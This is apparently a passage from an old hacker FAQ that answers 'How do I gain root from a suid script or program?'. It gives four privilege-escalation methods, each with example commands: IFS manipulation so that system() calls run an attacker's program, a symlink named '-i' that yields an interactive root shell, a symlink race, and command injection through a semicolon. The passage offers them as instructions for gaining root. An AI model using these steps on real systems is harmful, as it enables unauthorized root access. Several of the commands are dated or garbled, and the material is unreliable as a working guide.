10. How do I gain root from a suid script or program?

1. Change IFS.
If the program calls any other programs using the system() function call,
you may be able to fool it by changing IFS. IFS is the Internal Field
Separator that the shell uses to delimit arguments.
If the program contains a line that looks like this:

system("/bin/date")

and you change IFS to '/' the shell will them interpret the proceeding line
as:

bin date

Now, if you have a program of your own in the path called "bin" the suid
program will run your program instead of /bin/date.
To change IFS, use this command:

IFS='/';export IFS      # Bourne Shell
setenv IFS '/'          # C Shell
export IFS='/'          # Korn Shell

2. link the script to -i
Create a symbolic link named "-i" to the program. Running "-i" will cause
the interpreter shell (/bin/sh) to start up in interactive mode. This only
works on suid shell scripts.
Example:

% ln suid.sh -i
% -i
#

3. Exploit a race condition
Replace a symbolic link to the program with another program while the
kernel is loading /bin/sh.
Example:

nice -19 suidprog ; ln -s evilprog suidroot

4. Send bad input to the program.
Invoke the name of the program and a separate command on the same command
line.
Example:

suidprog ; id